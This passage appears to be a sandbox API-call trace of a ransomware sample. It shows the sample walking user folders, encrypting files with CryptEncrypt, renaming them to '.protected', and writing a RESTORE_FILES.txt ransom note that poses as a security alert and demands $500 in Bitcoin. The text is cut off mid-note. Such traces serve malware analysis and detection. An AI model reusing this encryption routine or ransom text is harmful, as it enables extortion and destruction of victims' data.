lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.969] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.969] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.969] CloseHandle (hObject=0xd8) returned 1 [0086.970] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav.protected") returned 73 [0086.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zfqwow.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zfqwow.wav.protected")) returned 1 [0086.971] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="Windows") returned -1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="Program Files") returned -1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="Program Files (x86)") returned -1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="$Recycle.bin") returned 1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="System Volume Information") returned -1 [0086.971] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp") returned 61 [0086.971] lstrcmpW (lpString1="~nsu.tmp", lpString2=".") returned 1 [0086.971] lstrcmpW (lpString1="~nsu.tmp", lpString2="..") returned 1 [0086.971] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\*") returned 63 [0086.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.972] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.972] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.972] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.972] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.973] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.973] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\.") returned 63 [0086.973] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.973] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.973] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.973] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.973] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.973] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.973] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.973] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\..") returned 64 [0086.973] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.973] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.973] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="Windows") returned -1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="Program Files") returned -1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="Program Files (x86)") returned -1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="$Recycle.bin") returned 1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="System Volume Information") returned -1 [0086.973] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.973] StrStrIW (lpFirst="Au_.exe", lpSrch=".protected") returned 0x0 [0086.973] lstrcmpW (lpString1="Au_.exe", lpString2="RESTORE_FILES.txt") returned -1 [0086.973] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.973] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\au_.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.974] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.974] StrStrW (lpFirst="Au_.exe", lpSrch=".txt") returned 0x0 [0086.974] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.974] StrStrW (lpFirst="Au_.exe", lpSrch=".rar") returned 0x0 [0086.974] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.974] StrStrW (lpFirst="Au_.exe", lpSrch=".zip") returned 0x0 [0086.974] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.975] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.975] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.975] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.975] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0086.976] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0086.976] CloseHandle (hObject=0x14c) returned 1 [0086.976] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe.protected") returned 79 [0086.976] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\au_.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\au_.exe.protected")) returned 1 [0086.977] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.977] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.977] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\RESTORE_FILES.txt") returned 79 [0086.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.979] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.979] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.980] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.980] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.980] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.980] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.980] CloseHandle (hObject=0xd8) returned 1 [0086.980] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0086.980] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0086.980] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES.txt") returned 70 [0086.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0086.981] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.981] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0086.982] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.982] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0086.982] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.982] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0086.982] CloseHandle (hObject=0xd4) returned 1 [0086.983] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Windows") returned -1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files") returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files (x86)") returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="$Recycle.bin") returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="System Volume Information") returned 1 [0086.983] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files") returned 72 [0086.983] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0086.983] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0086.984] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*") returned 74 [0086.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0086.984] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="Windows") returned -1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="Program Files") returned 1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="Program Files (x86)") returned 1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="$Recycle.bin") returned 1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="System Volume Information") returned 1 [0086.984] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore") returned 60 [0086.984] lstrcmpW (lpString1="VirtualStore", lpString2=".") returned 1 [0086.984] lstrcmpW (lpString1="VirtualStore", lpString2="..") returned 1 [0086.984] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*") returned 62 [0086.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0086.985] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.985] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.985] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.985] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.985] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.985] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\.") returned 62 [0086.985] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.985] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.985] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.985] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.985] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.985] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.985] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\..") returned 63 [0086.985] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.985] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.985] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0086.985] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0086.985] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\RESTORE_FILES.txt") returned 78 [0086.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0086.986] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.986] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0086.987] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.987] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0086.987] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.987] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0086.987] CloseHandle (hObject=0xd4) returned 1 [0086.988] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0086.988] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0086.988] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RESTORE_FILES.txt") returned 65 [0086.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0086.989] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your 